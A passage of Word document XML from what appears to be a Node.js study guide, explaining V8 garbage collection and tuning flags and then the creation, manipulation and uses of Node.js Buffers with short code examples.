    <w:p w14:paraId="46E0E1F1" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>V8 performs memory compaction to reduce fragmentation. During compaction, live objects are moved to contiguous memory blocks, which helps to efficiently allocate memory and improve performance. Compaction is typically done during major GC phases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C48BF54" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Garbage Collection Algorithms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE0DF1E" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>V8 uses various algorithms to optimize garbage collection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DC676D" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Mark-and-Sweep</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Identifies and reclaims unreachable objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10789F29" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Mark-and-Compact</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Combines marking and compaction to reduce fragmentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7EA435" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Adaptive Algorithms</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Adjusts the frequency and strategy of garbage collection based on the application's behavior and memory usage patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6E8DEC" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Monitoring and Tuning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B477C90" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Monitoring GC Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: You can use tools like --trace-gc to monitor garbage collection activities and performance in Node.js.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6066EB" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562"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node --trace-gc your-script.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C58F6C1" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Tuning GC Settings</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: You can adjust V8's garbage collection settings using command-line flags such as --max-old-space-size to set the maximum size of the old generation heap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DFDC22" w14:textId="653741B8" w:rsidR="00DF0F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562"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node --max-old-space-size=4096 your-script.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191B5230" w14:textId="410D0142" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc178383275"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is buffer in Node.js</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w14:paraId="78A35826" w14:textId="77777777" w:rsidR="00DF27EC" w:rsidRPr="00DA2F32" w:rsidRDefault="00DF27EC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Creating Buffers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D79B493" w14:textId="77777777" w:rsidR="00DF27EC" w:rsidRPr="00DA2F32" w:rsidRDefault="00DF27EC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>There are several ways to create a Buffer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31112E2A"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From an Array</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Create a Buffer from an array of bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE5876F"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lastRenderedPageBreak/>
        <w:t>const buf = Buffer.from([1, 2, 3, 4, 5]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F898A89"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From a String</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Create a Buffer from a string, specifying the encoding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797DC88B"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const buf = Buffer.from('Hello, world!', 'utf-8');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69836997"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Allocating Buffers</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Create an uninitialized or zero-filled Buffer with a specified size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AF9F8B"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buf1 = Buffer.alloc(10); // Creates a Buffer of 10 bytes, initialized to 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49885A8F"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const buf2 = Buffer.allocUnsafe(10); // Creates a Buffer of 10 bytes, uninitialized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F06E93C"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Allocating with a Size</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Create a Buffer with a specific size, which will be zero-filled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5383AC2B"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const buf = Buffer.alloc(20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D70C44F" w14:textId="77777777" w:rsidR="00DF27EC" w:rsidRPr="00DA2F32" w:rsidRDefault="00DF27EC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Buffer Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2810F8"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length</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The length of the Buffer in bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D044A8A"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console.log(buf.length);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AC4B2C"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toString()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Converts the Buffer to a string with a specified encoding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0EF200"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console.log(buf.toString('utf-8'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6166A737"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slice(start, end)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Creates a new Buffer that references a portion of the original Buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18845958"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const slicedBuf = buf.slice(0, 5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2864536C"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copy(targetBuffer, targetStart, sourceStart, sourceEnd)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Copies data from one Buffer to another.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D822ED2"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buf.copy(targetBuffer, 0, 0, 5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364B1E9C" w14:textId="77777777" w:rsidR="00DF27EC" w:rsidRPr="00DA2F32" w:rsidRDefault="00DF27EC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Buffer Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE204EF" w14:textId="77777777" w:rsidR="00DF27EC" w:rsidRPr="00DA2F32" w:rsidRDefault="00DF27EC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Buffers support a variety of operations for manipulating binary data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE442DA"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Reading and Writing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Read and write different data types from/to the Buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3CCAA3"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buf.writeUInt8(255, 0); // Write an unsigned 8-bit integer at index 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0036B51F"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console.log(buf.readUInt8(0)); // Read the unsigned 8-bit integer at index 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCF1AF0"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Concatenation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Combine multiple Buffers into a single Buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71084EB4"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buf1 = Buffer.from('Hello, ');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C03DE8"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buf2 = Buffer.from('world!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7813EA7C"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const buf3 = Buffer.concat([buf1, buf2]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1784E5"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Comparison</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Compare two Buffers to see if they are equal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1141F5"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console.log(buf1.equals(buf2));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471C0CF3"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Filling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Fill a Buffer with a specific value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB557CD"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buf.fill(0); // Fills the Buffer with 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF6510E" w14:textId="77777777" w:rsidR="00DF27EC" w:rsidRPr="00DA2F32" w:rsidRDefault="00DF27EC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D904A0C"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File I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Read and write binary files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3BC806"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16755271"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const buf = fs.readFileSync('example.bin');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE87EBC"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Network Protocols</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Handle binary data in network protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3935F383"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net = require('net');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CBA894"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server = net.createServer((socket) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510F1440"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socket.on('data', (data) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A88B6F6"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console.log(Buffer.isBuffer(data)); // Check if data is a Buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DFE1CA"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CE60E34"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0BB9245" w14:textId="77777777" w:rsidR="00DF27EC" w:rsidRPr="00DA2F32" w:rsidRDefault="00DF27EC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="265"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cryptography</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Work with binary data in cryptographic operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE1CBD5"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crypto = require('crypto');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435592FB"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hash = crypto.createHash('sha256');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F4708A"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hash.update(Buffer.from('some data'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708E314D"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const digest = hash.digest();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0648A4" w14:textId="77777777" w:rsidR="00DF27EC"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rPr>
        <w:t>Example Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1D842E" w14:textId="77777777" w:rsidR="00DF27EC" w:rsidRPr="00DA2F32" w:rsidRDefault="00DF27EC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Here's a complete example that demonstrates creating, manipulating, and using Buffers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1DB00E"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Create a Buffer from a string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F7D92E"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buf = Buffer.from('Hello, world!', 'utf-8');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0653C096" w14:textId="77777777" w:rsidR="00DF27EC" w:rsidRPr="00DA2F32" w:rsidRDefault="00DF27EC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="560FEC2B"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Read data from the Buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE417DF"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console.log(buf.toString()); // Output: Hello, world!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38748F38" w14:textId="77777777" w:rsidR="00DF27EC" w:rsidRPr="00DA2F32" w:rsidRDefault="00DF27EC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AA71C93"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Write data to the Buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28002D50"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buf.write('Hi', 0, 'utf-8');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D71DD8"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console.log(buf.toString()); // Output: Hi, world!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA0C1C2" w14:textId="77777777" w:rsidR="00DF27EC" w:rsidRPr="00DA2F32" w:rsidRDefault="00DF27EC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E360497"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Slice the Buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795B223E"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slicedBuf = buf.slice(0, 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383D9B6F"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console.log(slicedBuf.toString()); // Output: Hi</w:t>
      </w:r>
    </w:p>
